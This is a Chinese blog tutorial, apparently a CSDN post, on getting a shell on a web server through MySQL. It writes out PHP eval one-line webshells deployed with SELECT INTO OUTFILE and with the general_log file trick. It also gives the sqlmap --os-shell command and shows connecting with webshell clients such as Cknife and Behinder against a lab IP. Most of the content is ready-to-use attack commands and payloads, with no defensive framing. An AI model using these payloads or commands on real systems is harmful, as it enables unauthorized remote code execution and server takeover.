mysql写入木马getshell总结

0x01 环境搭建

nmap查看开放端口信息

常用命令nmap -sT -Pn -sV IP地址
image-20220225012878230
查看phpinfo信息

在这里插入图片描述

mysql弱口令爆破,这里是空口令,免去爆破过程

0x02 select into outfile写入木马

sql语句

select '<?php @eval($_POST[1]);?>' into outfile 'C:/phpStudy/WWW/shell.php'

image-20220225012878232
注意这里用了 分号; 结尾

Cknife连接木马

image-20220225012878233

连接

image-20220225012878234

0x03 SQL语句利用日志写shell

outfile被禁止,或者写入文件被拦截;

在数据库中操作如下:(必须是root权限)

show variables like '%general%';  查看日志状态
SET GLOBAL general_log='on'     开启日志读写
SET GLOBAL general_log_file='C:/phpStudy/WWW/x.php';  指定需要写入日志路径
SELECT '<?php eval($_POST["cmd"]);?>'  写日志进x.php

访问 http://192.168.32.144/x.php

image-20220225012878235

使用C刀连接

image-20220225012878236

image-20220225012878237

在目标服务器上查看x.php文件

image-20220225012878238

0x04 sqlmap写入一句话getshell

使用命令–os-shell,注意需要是root权限,否则可能写入不成功

python sqlmap.py -r E:\Users\Administrator\Desktop\抓包.txt -p "id" --os-shell

image-20220225012878239

在这里插入图片描述

交互式shell不再赘述,上图已显示

访问sqlmap留的上传点 http://192.168.32.144/tmpuufgd.php

image-20220225012878241

点击upload,上传成功,访问http://192.168.32.144/ceshi.php

如图,证明已上传成功

image-20220225012878242

冰蝎连接

image-20220225012878243

  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值